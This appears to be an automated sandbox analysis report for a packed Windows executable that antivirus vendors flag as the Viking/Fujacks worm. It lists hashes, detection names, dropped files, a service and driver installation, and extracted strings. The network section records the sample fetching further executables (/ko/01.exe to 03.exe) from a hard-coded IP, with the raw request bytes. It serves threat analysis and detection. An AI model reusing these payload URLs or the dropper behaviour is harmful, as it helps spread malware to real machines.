Analysis Date2015-01-28 07:39:36
MD501af29910b1198aa9e5acf8b174a3230
SHA1882d06ae9e9d3a74453b7b15f6e6c800d85d4d7c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: 9c149867937ad06ee54360cb6463f6ea sha1: 3ad3e2bce59c3bf0fade199e97e50181753514cf size: 41472
Section.rsrc md5: 19e155042fc0b9835d15338973193df9 sha1: 57ddca84449c0c1390fb4c396957cc297dee7b8f size: 7168
Section.tc md5: cd67b588714b840e2f9f5976d2a8d35b sha1: abd674d9a156ccc10b52f8c00571bdbcc8862e2a size: 26624
Timestamp2002-12-18 15:52:40
PEhasha31648224bc77e5462e25e68b81840de01c7ec5b
IMPhash8b21ff8a0d0059e9d67b568f049de051
AV360 SafeVirus.Win32.Agent.O
AVAd-AwareWin32.Viking.AR
AVAlwil (avast)Viking-CF:Win32:Viking-CF
AVArcabit (arcavir)Win32.Viking.AR
AVAuthentiumW32/Risk.UKXW-3317
AVAvira (antivir)W32/Fujacks.DR
AVBullGuardWin32.Viking.AR
AVCA (E-Trust Ino)Win32/Viking.D
AVCAT (quickheal)W32.Agent.DP
AVClamAVWorm.Fujack-55
AVDr. WebWin32.HLLW.Autoruner.8224
AVEmsisoftWin32.Viking.AR
AVEset (nod32)Win32/Agent.DP virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/MalwareS.HIF
AVF-SecureWin32.Viking.AR
AVGrisoft (avg)Win32/Fujacks.S
AVIkarusTrojan-Downloader.Win32.Jadtre
AVK7Virus ( 00108a531 )
AVKasperskyVirus.Win32.Agent.dp
AVMalwareBytesno_virus
AVMcafeeW32/Fujacks.ay
AVMicrosoft Security EssentialsError Scanning File
AVMicroWorld (escan)Win32.Viking.AR
AVRisingWin32.Agent.hn
AVSophosW32/FuzVir-A
AVSymantecW32.Loorp.A!inf
AVTrend MicroPE_JEEFO.D
AVVirusBlokAda (vba32)Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts ServiceWmdmPmSN

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileNtHid
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\HRSBU4WO\desktop.ini
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\HMZ5046A\desktop.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\6JGTYZAJ\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\25VLYEY8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS204.11.56.45
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1864

Process
↳ Pid 1140

Network Details:

DNSwww.a.shifen.com
Type: A
180.76.3.151
DNSpc1.114central.com
Type: A
204.11.56.45
DNSnbtj.114anhui.com
Type: A
DNSwww.baidu.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GEThttp://204.11.56.45/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1034 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1035 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....


Strings
TE..
...
DVCLAL
FILE
GETPASSWORD1
LICENSEDLG	RENAMEDLG
REPLACEFILEDLG
STARTDLG
						
							
														
																												
 0+020e0k0
0,0A0^0s0
08101BB
0j/0@0E0R0f0
0Sx[e0,H
0T0X0\0`0d0h0l0p0t0x0|
1=>=F=
:1G1P1]1
1K1Z1h1
?%?2?]?
2(2B2N2W2c2n
2<2Q{h2p2
2?3H3Q
2D2J2O2U2b1n2t2
>2>E>S>\>s>
2K2f2v2
2P'N.:
2T2d2{2
3$30l3Xk
343=3B3j3p3|3
*37}Cg
;3D;H;L
@3T3e3
4`@,1 L
4&414]4
4%4+4G4
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
4bXND4'R
;4@LXd,
4MXdp|
4Q5e5x
5!6&6/6
)56Ab5t5
;!;+;5;?;C;J;
:5:F:Y:w:|:
%'5k#C
&5Ond|
6.6:6C6M6W6\6
6<6]6i6
6!71767D7R7^7i7p7
}68:&nbsp;
68wW(4
[6\MBros
!(6u_x
7.{645FF040
7FC663
7@ip:K
?7N7T7]
8-00AA
@.&'85
>!>*>8>B>H>V>`>
*8xCkr
9*:/$:
954E}K
^9>(5se9
@\96DBA2^
9 9[9`9g9m9s9~9
9&9/9>9Q9e
-9;9A9F9
9ao^@q
9I?EMF
9.:U:p:}:
9uSI)^
A4J4Y4_4
 A(!4M
A67-586
aDDINA
ADVAPI32.dll
ADVAPI32.DLL
AE4C57'
agX \s
a Play
appmgmts.dlld
ArT?`cvp
ASSWORD1
"bd	WVS
bgTLOkN
browser
C1E870B0C
CancelConne
 cannot be run i
CloseHandle
>COMC6
COMCTL32.DLL
Copyro
CPInfo
CP<Z<|<
CreateFileA
CreateProcessA
crypt'c
D[>*;-
D0H0L0PM
D9mD:kD=iD>
DA-6D69-472e-8981-DBC71
Ddk h$
D*{D-yD.wD1
default
DeleteObject
(D/fc_oL
DOS mode.
dU5 B~
&=,=D=v=
 E#^@7
E8J8O8[8`8i8o8z8
E9Q	w07
))EE	F
EF+cTi
Envkon
ep1'*"/
eParam$
epaWaOS
equiv="c
Esht*6
e	[vB!
ExecuUA
ExitProcess
Expor.exe
F??3@YAXP
F8|8]_s/D+
f+D?	D
FeLibra
 $(FFFF,048FFFF<@DHFFFFLPTXFFFF\`dhFFFFlptxFFFF|
=fnc\C
FPzHl3
f)S7'u+
)$< G5
GDI32.DLL
GetProcAddress
GetTempPathA
gg=7VP
h1l1.T
h3&nO$g
HAutoComplete
hEU_qO
h:Fr; 
%H.k(ug
'hortc
Hur3'$
I)BCSL
iD&YomH
ifyTrLo
igVCRT
InfGma
ingCompatibil
INNSC">"
IocSymd
i|tlh`
IXR-!m
_;i;z;
j$)ALE
	j	)\L
k29 |l
 -k 4/
!K<a~WU~
kca:\lsa
KERNEL32.DLL
KEveny
KH)LaQ
K]$$nX
kOY)`7
K:\Q.pdb`q
Ks, 4=`I
K <\+w
L5PFHP7b
lA|(S>
lClassN
l!G!`O/f&T?
<:l http-
LoadLibraryA
lp6a J
lstrcatA
{LwL/O,
m1\U\Kcn
 M3PDHL
M4s+/,(4
M8WwuE
M:d:m:
~m E!u)y
MSN Gam
MSVCRT.dll
NAM	%s 
-{nr8 N
ns,res
 NT\Curr
NtQu9y
Number
Nv`mG}
^ny{fY-f
oft\Wud
OLE32.DLL
OleInitialize
o@P3e4
Op-;4$
~OPEN=-
+OpsSCM
|otB.8
,ov\A}
OverwrNk
o #Z	f
PathFileExistsA
penc !
p-p?d/
PV_gp_j7Mx
pVKwOf
P;Z;d;n;x;
q$A3<.
QGKN&,s
qidu.com
Q!k/K3C
QQQQQQQ
qwSKNC
$>)`r!
R:2tZ;
\Ra7207
'RC,@a
 `.rdat[
RECYCLER
RegCloseKey
Remote
REPLACEFIL
_rju@_fd
;RNh8Y
-<RoA%'_h7
RtlIoU
R)ZnX9
S1[1`1m1
s1wEzy
)S37%.-
{schedsvc
S$C v	D
sDirHR7SFX=ln
sdm&TN
SDPSRV
sD'Tim
SetMenu
SHELL32.DLL
SHGetMalloc
SHLWAPI.dll
SHr,gq]
SOFTWARE\Mi
Sp`FFF
S&SCwXn
START7ichEdit]L
sTex T$
StringA
s_/UYY
swsocknetman1ssdp
T)C\71;5
.tcLCI0
+T&$cT0P^
.textVT
_This #g
!This program cannot be run in DOS mode.
This program must be run under Win32
tiI,WideCharR]
T"jllp%+
tl`TDi
tM/hr;
ToFilnH
TPR vc
&trMx_O
tTisrv
t?>[u3
tx3D#+
?%_#txg
-type" 
uD2sD5qD6o{
>"u:F@
U!g@0p<Hk
	U;MhOy
uMpr.{
#upnphostKn&s
URLDown
urruVssion[ogr
USER32.dll
USER32.DLL
v,{= _
V3_3o3x3
V6sion\
v7Os2_qWSArcvF
v|htcL
vieAak:m
VirtualAlloc
VirtualFree
VirtualProtect
V?oh`x6
vThfad
\v:.X$
vY22!g
W0YX0wx
|w9=trW
wapi.dll
\Windows\C
 winsta0
WithTag	
w;LCal
WmdmPmSN'Fa
Wnd[juG
WO$_9E
Writea7
WriteFile
wsprintfA
`wxFD@
w{X*)k
<	=x=}=
/X,.CC
/XfxnamEK
 X -ibcB"
<)<.<X<i<o
xmlpbS
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Roshal.WinRAR.WinRAR" type="win32" /> <description>WinRAR archiver.</description> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /> </dependentAssembly> </dependency> </assembly>
{+xN{?ODBE
^$xnre
XPTPSW
XPVSSG
XRichS
XSHB_ws
xwuLEwE
~X[(WW
XX; tg
/;%y;~;
	(y*]3
.y!GN&
YNANRv
{<:y&q?	
|/Yr3Y
*y/.uzyzuEFz8GD
y%*+vp*vCpuC%
/YW'RB
Z2fQ`d
(ze:12;
@z}]u2o